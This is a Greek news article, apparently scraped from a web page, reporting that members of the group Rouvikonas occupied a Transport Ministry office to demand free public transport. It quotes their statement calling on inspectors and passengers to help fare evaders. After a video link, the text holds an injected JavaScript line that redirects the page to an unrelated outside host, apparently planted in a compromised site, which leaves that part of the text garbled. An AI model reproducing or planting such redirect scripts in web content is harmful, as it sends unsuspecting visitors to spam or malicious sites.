Κατάληψη από τον Ρουβίκωνα σε γραφεία του υπ. Μεταφορών (BINTEO)

0
11

 

Μέλη της αντιεξουσιαστικής ομάδας Ρουβίκωνα εισέβαλαν το πρωί σε γραφείο του υπουργείου Μεταφορών στην Καραγιώργη Σερβίας ζητώντας δωρεάν μεταφορές με τα μέσα μαζικής μεταφοράς.

Σε κείμενο που ανήρτησαν σε ιστοσελίδα αναφέρουν: «Καταλάβαμε συμβολικά τα γραφεία του Σώματος Επιθεωρητών Ελεγκτών Υπουργείου Μεταφορών και Επικοινωνιών στην πλατεία Συντάγματος για να δώσουμε αυτά τα μηνύματα αλλά και ένα μήνυμα ακόμα, προς τους ίδιους τους ελεγκτές.

»Κάθε φορά που βρίσκεστε απέναντι σε ένα ‘κυνηγημένο ζώο’ που δεν είχε το 1,40 ευρώ εσείς επιλέγετε να δείτε ένα παραβάτη, έναν κλέφτη, έναν που υπάγεται στο πρωτόκολλο του προστίμου.

»Σας καλούμε να αρνηθείτε το ρόλο σας, να αρνηθείτε αυτή τη δουλειά, να αφήνετε τους ‘παραβάτες’ δηλαδή τους φτωχούς να την σκαπουλάρουν. Έτσι απλά.

»Καλούμε επίσης τους άλλους εργαζόμενους και τα σωματεία των συγκοινωνιών να πάρουν ξεκάθαρη θέση στο θέμα. Τους καλούμε να συνταχθούν με τα συμφέροντα της βάσης, των επιβατών να παλέψουν στην πράξη και με έργα για ελεύθερες μετακινήσεις για όλους.

»Καλούμε τους επιβάτες, τον καθένα, να δείξει την αλληλεγγύη του δίνοντας με το τέλος της διαδρομής το εισιτήριο του σε άλλον επιβάτη, επεμβαίνοντας κάθε φορά που ελεγκτές τραμπουκίζουν, ενημερώνοντας για την παρουσία ελεγκτών σε σταθμούς και μέσα».

Τα μέλη του Ρουβίκωνα βρίσκονται ακόμη μέσα στο κτίριο έξω από το οποίο υπάρχει ισχυρή αστυνομική δύναμη.

https://youtu.be/vGSVzMLz4Nk setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here